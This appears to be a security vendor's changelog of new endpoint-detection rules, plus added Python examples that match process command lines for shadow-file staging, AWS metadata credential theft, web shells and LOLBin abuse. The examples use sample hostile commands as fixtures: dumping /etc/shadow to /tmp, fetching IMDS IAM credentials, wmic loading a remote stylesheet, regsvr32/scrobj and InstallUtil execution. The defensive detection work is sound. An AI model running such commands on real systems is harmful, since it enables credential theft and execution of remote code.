==================================================

CREATED: WIN-CMSTP-UAC-BYPASS (#2024)

Description

This detector identifies a User Account Control (UAC) bypass technique that leverages the CMSTP COM object: the auto-elevated CMSTPLUA COM interface exposed by cmstp.exe allows code to be executed at high integrity without a UAC prompt.

ATT&CK Technique T1191
ATT&CK Technique T1088

==================================================

CREATED: WIN-OFFICE-ARCHIVE-WRITE (#2191)

Description

This detector identifies Microsoft Office products writing an archive to disk. Adversaries can craft a malicious document (maldoc) that drops a malicious archive on the host as a delivery mechanism.

ATT&CK Technique T1192

==================================================

CREATED: WIN-IE4UINIT-BASE-SETTINGS (#2213)

Description

This detector identifies ie4uinit.exe launching with the -BaseSettings switch, which processes commands from an ie4uinit.inf file. Adversaries can place arbitrary commands in that file to have them executed by a signed Microsoft binary.

ATT&CK Technique T1088

==================================================

CREATED: PRODUCT-MARSHMALLOW-SWEET (#2217)

This detector identifies executions of programs that are part of the MarshmallowSweet product; these programs are classified as Adware in the Generic category and are known to distribute various types of adware.

==================================================

CREATED: PRODUCT-BITCOMET (#2219)

This detector identifies executions of programs that are part of the Bitcomet product; these programs are classified as P2P in the Torrent category. Bitcomet is a peer-to-peer application that could lead to the installation of unwanted software.

==================================================

CREATED: NIX-SHADOW-OUTPUT-TEMP (#2222)

Description

This detector identifies the /etc/shadow file being dumped or copied into the /tmp directory. Adversaries use these files and directories for reconnaissance and credential extraction, staging the password hashes in a world-writable location for collection and offline cracking.

ATT&CK Technique T1087

==================================================

CREATED: WIN-WMIC-SPAWNING-REGSVR32 (#2231)

Description

This detector identifies the Windows Management Instrumentation Command-line utility (wmic.exe) spawning regsvr32.exe. This is an unusual process ancestry employed by the Astaroth malware family.

ATT&CK Technique T1117
ATT&CK Technique T1220

==================================================

CREATED: WIN-RUNDLL-EXEC-TEMP (#2232)

Description

This detector identifies instances of the Windows rundll32.exe process executing DLLs from Temp directories, a location commonly used by malware to stage malicious DLLs.

ATT&CK Technique T1085
ATT&CK Technique T1129

==================================================

CREATED: WIN-DTRACK-EXECUTION (#2236)

Description

This detector identifies a unique command line string present in DTrack infections. DTrack is a remote access trojan attributed to the Lazarus Group. It executes a ping-based sleep timer before attempting to redirect an echo string using incorrect syntax.

==================================================

CREATED: WIN-W3WP-CMD-ECHO (#2239)

Description

This detector identifies a chain of execution in which a Windows IIS worker process (w3wp.exe) spawns the Command Processor (cmd.exe). The echo command is commonly used to redirect command output back to a web shell, and adversaries employ this tactic to execute commands on compromised web servers.

ATT&CK Technique T1100

==================================================

CREATED: ANY-DIG-SIG-DBG (#2240)

Description

This detector identifies execution of binaries signed by known pentest groups. These code signing certificates have been observed by Red Canary in red team engagements.

ATT&CK Technique T1116

==================================================

CREATED: WIN-SYSPREP-EXEC-APPDATA (#2242)

Description

This detector identifies instances of the Windows binary sysprep.exe loading code from suspicious locations such as AppData. Because sysprep.exe auto-elevates, a DLL it loads from an attacker-controlled path runs with elevated privileges, allowing adversaries to bypass User Account Control (UAC).

ATT&CK Technique T1088

==================================================

CREATED: WIN-RUNDLL-EXEC-ORDINAL-CALL (#2243)

Description

This detector identifies suspicious instances of the Windows process rundll32.exe executing an exported DLL function by its ordinal value.

ATT&CK Technique T1085
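The two rundll32 detectors above (WIN-RUNDLL-EXEC-TEMP and WIN-RUNDLL-EXEC-ORDINAL-CALL) both hinge on pulling the DLL path and entry point out of the rundll32 command line. The following is an added example, not Red Canary's detector logic: it parses the `<dll>,<entry> [args]` form rundll32 expects (quoted paths included), flags `#<n>` ordinal entries, and flags DLLs under a Temp directory. The sample command lines are constructed for illustration, and treating ordinal calls into DLLs outside C:\Windows as the suspicious variant is an assumption made here.

```python
import re

# Constructed rundll32 command lines for illustration (not from the original page).
SAMPLES = [
    r'rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL',
    r'rundll32.exe shell32.dll,#61',
    r'"C:\Windows\System32\rundll32.exe" "C:\Users\bob\AppData\Local\Temp\up.dll",#2',
    r'rundll32 C:\Users\bob\AppData\Local\Temp\a.dll,DllRegisterServer',
    r'rundll32.exe C:\ProgramData\x.dll, #1 -k',
    r'rundll32.exe',
]

TEMP_DIR_RE = re.compile(r'\\(temp|tmp)\\', re.IGNORECASE)
WINDOWS_DIR_RE = re.compile(r'^[a-z]:\\windows\\', re.IGNORECASE)
ORDINAL_RE = re.compile(r'^#\d+$')


def parse_rundll32(cmdline):
    """Split a rundll32 command line into its DLL path, entry point and arguments.

    rundll32 expects "<dll>,<entry> [args]"; <entry> is an export name or, when
    prefixed with '#', an export ordinal.  The DLL path may be quoted.  Whitespace
    around the comma is tolerated here so minor variations do not evade the check.
    Returns None when no DLL argument is present.
    """
    m = re.match(r'\s*(?:"[^"]*"|\S+)\s*(.*)$', cmdline)  # drop the executable token
    rest = m.group(1).strip() if m else ''
    if not rest:
        return None
    if rest.startswith('"'):
        end = rest.find('"', 1)
        if end < 0:
            return None
        dll, rest = rest[1:end], rest[end + 1:].lstrip()
    else:
        m = re.match(r'([^,\s]+)(.*)$', rest)
        dll, rest = m.group(1), m.group(2).lstrip()
    entry = None
    m = re.match(r',\s*(\S+)(.*)$', rest)
    if m:
        entry, rest = m.group(1), m.group(2)
    return {'dll': dll, 'entry': entry, 'args': rest.strip()}


def classify(cmdline):
    """Return detector-style findings for one rundll32 command line."""
    parsed = parse_rundll32(cmdline)
    findings = []
    if parsed is None:
        return findings
    dll, entry = parsed['dll'], parsed['entry']
    if entry and ORDINAL_RE.match(entry):
        findings.append('ordinal-export-call')
        # Assumption for this example: ordinal calls into DLLs under C:\Windows, or
        # bare names that normally resolve to system DLLs (shell32.dll,#61), are
        # routine; an ordinal call into a DLL elsewhere on disk is the variant worth
        # escalating.
        if '\\' in dll and not WINDOWS_DIR_RE.match(dll):
            findings.append('ordinal-call-outside-windows-dir')
    if TEMP_DIR_RE.search(dll):
        findings.append('dll-in-temp-dir')
    return findings


if __name__ == '__main__':
    for sample in SAMPLES:
        print(f'{classify(sample)!r:72} {sample}')
```

Parsing the DLL path before matching matters because a Temp path may be quoted or followed by arguments, and because the entry point is what distinguishes a benign `shell32.dll,Control_RunDLL` from an ordinal call that hides the export name.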

==================================================

CREATED: WIN-EXEC-OUTLOOK-TEMP-FOLDER (#2248)

Description

This detector identifies binaries executing from the Microsoft Outlook temporary folder, where Outlook extracts attachments when they are opened. Adversaries can store payloads within this directory.

ATT&CK Technique T1193

==================================================

CREATED: WIN-SUSP-MSIEXEC-DIR (#2249)

Description

This detector identifies instances of the Microsoft Installer process (msiexec.exe) executing from abnormal directories.

ATT&CK Technique T1218

==================================================

CREATED: WIN-EXEC-USER-DEFAULT-FOLDER (#2250)

Description

This detector identifies binaries executing from the default user profile directory C:\Users\Default, a location that legitimate software rarely executes from.

ATT&CK Technique T1036

==================================================

CREATED: WIN-RYUK-CMD-LINE (#2251)

Description

This detector identifies an indicator for the early stages of deployment of Ryuk ransomware.

==================================================

CREATED: WIN-EXEC-CONFIG-SYSPROF-FOLDER (#2253)

Description

This detector identifies binaries executing from the Windows directory \windows\system32\config\systemprofile\.

ATT&CK Technique T1063

==================================================

CREATED: PRODUCT-NORDVPN-VPN (#2262)

This detector identifies executions of programs that are part of the NORDVPN product; these programs are classified as Riskware in the VPN category, as a third-party, potentially unwanted, VPN client.

ATT&CK Technique T1410

==================================================

CREATED: WIN-SEARCHPROTOCOLHOST-NO-CLI (#2263)

Description

This detector identifies instances of the Windows process searchprotocolhost.exe executing without command line arguments. Legitimate instances are launched by the Windows Search indexer with command line arguments, so an argument-less instance warrants investigation.

==================================================

CREATED: LINUX-CF-AWS-INSTANCE-METADATA (#2266)

Description

This detector identifies use of the AWS Instance Metadata Service (IMDS) to obtain AWS security credentials, namely the temporary IAM role credentials the service exposes to the instance.

ATT&CK Technique T1522
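Both NIX-SHADOW-OUTPUT-TEMP above and LINUX-CF-AWS-INSTANCE-METADATA here are command-line detections on Linux, and both are easy to miss if the sensor only sees `sh -c "<script>"`. The following is an added example, not Red Canary's detector logic: it tokenizes a command line shell-style, unwraps `-c` scripts so redirections are visible, and then checks for /etc/shadow being written or copied into a temp directory and for requests to the IMDS IAM credential path. The sample command lines are constructed, and the IMDS endpoints, temp directories and shell names are assumptions chosen for this example. It needs Python 3.8 or later for shlex's punctuation_chars handling.

```python
import os
import shlex

SHELLS = {"sh", "bash", "dash", "zsh", "ash"}
IMDS_HOSTS = ("169.254.169.254", "fd00:ec2::254")   # IMDS IPv4 and IPv6 endpoints (assumed list)
CRED_PATH = "/meta-data/iam/security-credentials"
TEMP_DIRS = ("/tmp", "/var/tmp", "/dev/shm")       # world-writable staging dirs (assumed list)


def tokenize(cmdline):
    """Shell-style split that also separates redirection and control operators."""
    lex = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    try:
        return list(lex)
    except ValueError:          # unbalanced quotes: fall back to a plain split
        return cmdline.split()


def flatten(tokens):
    """Unwrap `sh -c '<script>'` so the script the shell will actually run is inspected."""
    out = []
    i = 0
    while i < len(tokens):
        if (os.path.basename(tokens[i]) in SHELLS and i + 2 < len(tokens)
                and tokens[i + 1] == "-c"):
            out.extend(flatten(tokenize(tokens[i + 2])))
            i += 3
        else:
            out.append(tokens[i])
            i += 1
    return out


def in_temp_dir(path):
    return any(path == d or path.startswith(d + "/") for d in TEMP_DIRS)


def detect_shadow_to_temp(tokens):
    # /etc/shadow named anywhere on the line, plus a temp-directory path that can
    # be a redirection target (the '>' token is split out by tokenize) or a cp/mv
    # destination.
    reads_shadow = any(t.endswith("/etc/shadow") for t in tokens)
    temp_target = any(in_temp_dir(t) for t in tokens)
    return reads_shadow and temp_target


def detect_imds_credentials(tokens):
    # Only the IAM credential path is flagged; instance-id or user-data lookups
    # from the same host are routine for cloud-init and agents.
    return any(any(h in t for h in IMDS_HOSTS) and CRED_PATH in t for t in tokens)


def evaluate(cmdline):
    tokens = flatten(tokenize(cmdline))
    hits = []
    if detect_shadow_to_temp(tokens):
        hits.append("NIX-SHADOW-OUTPUT-TEMP")
    if detect_imds_credentials(tokens):
        hits.append("LINUX-CF-AWS-INSTANCE-METADATA")
    return hits


# Constructed command lines for illustration (not from the original page).
SAMPLES = [
    'sh -c "cat /etc/shadow > /tmp/.s"',
    "cp /etc/shadow /dev/shm/sh.bak",
    "curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/web-role",
    'bash -c "curl -s http://169.254.169.254/latest/meta-data/instance-id"',
    'curl -s -H "X-aws-ec2-metadata-token: $TOKEN" http://[fd00:ec2::254]/latest/meta-data/iam/security-credentials/',
    "cat /etc/shadow",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(f"{evaluate(sample)!r:40} {sample}")
```

Unwrapping `-c` is the piece worth keeping: a process-creation event for `sh -c "cat /etc/shadow > /tmp/.s"` carries the redirection only inside the script string, and a bare `cat /etc/shadow` with no temp target is deliberately left to other detections.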

==================================================

CREATED: PRODUCT-HAOZIP (#2267)

This detector identifies executions of programs that are part of the Haozip product; these programs are classified as Adware in the Generic category and are known to distribute various types of adware.

==================================================

CREATED: WIN-DEVTOOLS-EXEC-SUSP-BIN (#2269)

Description

This detector identifies instances of a Visual Studio developer component executing suspicious processes.

ATT&CK Technique T1127

==================================================

CREATED: LINUX-CF-JAVA-SPAWNING-SHELL (#2270)

Description

This detector identifies a network-active Java process spawning a shell, which could be indicative of webserver exploitation, a webshell, or a backdoor.

ATT&CK Technique T1100
ATT&CK Technique T1059

==================================================

CREATED: LINUX-CF-JAVA-SUSPICIOUS-CHILD (#2271)

Description

This detector identifies a Java process spawning a child process of interest.

==================================================

CREATED: WIN-POSSIBLE-SCRIPT-DROPPER (#2275)

Description

This detector identifies instances of scripts executing from directories commonly observed with malware droppers.

ATT&CK Technique T1064

==================================================

CREATED: WIN-EXPLORER-SPAWN-INSTALLUTIL (#2277)

Description

This detector identifies Windows Explorer spawning the .NET Framework Installation Utility (installutil.exe). Adversaries can leverage installutil to proxy execution of code through a trusted Windows utility as a means to bypass application whitelisting.

ATT&CK Technique T1118
ATT&CK Technique T1218
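WIN-WMIC-SPAWNING-REGSVR32, WIN-W3WP-CMD-ECHO and WIN-EXPLORER-SPAWN-INSTALLUTIL are all parent/child ancestry detections, optionally qualified by the child's command line. The following is an added example, not Red Canary's detector logic, showing how such rules evaluate over process-creation telemetry: it resolves each event's parent by PID, matches parent and child image names, and for the w3wp case additionally requires `echo` in the cmd.exe command line. The events, their field names (pid, ppid, image, cmdline) and the specific command lines are constructed for illustration, not captured data.

```python
import ntpath
import re

# Constructed process-creation events (not from the original page); the field
# names mirror what an endpoint sensor typically records for each process start.
EVENTS = [
    {"pid": 400,  "ppid": 4,    "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
    {"pid": 1200, "ppid": 400,  "image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "cmdline": 'w3wp.exe -ap "DefaultAppPool"'},
    {"pid": 1300, "ppid": 1200, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c cd /d C:\inetpub\wwwroot\&whoami&echo [S]&cd&echo [E]"},
    {"pid": 1400, "ppid": 1200, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "C:\inetpub\scripts\cleanup.bat"'},
    {"pid": 2000, "ppid": 900,  "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": 'wmic.exe os get /format:"https://example.invalid/a.xsl"'},
    {"pid": 2100, "ppid": 2000, "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32.exe /s /u /i:C:\Users\Public\x.sct scrobj.dll"},
    {"pid": 3000, "ppid": 700,  "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 3100, "ppid": 3000, "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe",
     "cmdline": r"InstallUtil.exe /logfile= /LogToConsole=false /U C:\Users\bob\Downloads\a.exe"},
]

# (rule name, parent image pattern, child image pattern, child cmdline pattern or None)
RULES = [
    ("WIN-W3WP-CMD-ECHO",             r"^w3wp\.exe$",     r"^cmd\.exe$",         r"\becho\b"),
    ("WIN-WMIC-SPAWNING-REGSVR32",    r"^wmic\.exe$",     r"^regsvr32\.exe$",    None),
    ("WIN-EXPLORER-SPAWN-INSTALLUTIL", r"^explorer\.exe$", r"^installutil\.exe$", None),
]


def image_name(path):
    """Lower-cased file name of a Windows image path, independent of host OS."""
    return ntpath.basename(path).lower()


def evaluate(events):
    """Return (rule name, child pid) for every event whose ancestry matches a rule."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for event in events:
        parent = by_pid.get(event["ppid"])
        if parent is None:          # parent not in this batch (or already exited)
            continue
        for name, parent_re, child_re, cmd_re in RULES:
            if not re.search(parent_re, image_name(parent["image"])):
                continue
            if not re.search(child_re, image_name(event["image"])):
                continue
            if cmd_re is not None and not re.search(cmd_re, event["cmdline"], re.IGNORECASE):
                continue
            hits.append((name, event["pid"]))
    return hits


if __name__ == "__main__":
    for name, pid in evaluate(EVENTS):
        print(f"{name:32} pid={pid}")
```

The cmd.exe child at pid 1400 is the reason for the command-line qualifier: IIS application pools do spawn cmd.exe for legitimate maintenance scripts, and what separates a web shell from those is the `echo` markers used to frame output for the attacker's HTTP response. Matching on image names also means a renamed child binary will slip past these rules, which is a known limitation of ancestry-only logic.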

==================================================

CREATED: WIN-TASKSCHE-WANNACRY (#2279)

Description

This detector identifies process executions that indicate WannaCry ransomware.

==================================================

CREATED: WIN-MEMSECSVC-WANNACRY (#2281)

Description

This detector identifies process executions that indicate WannaCry ransomware.
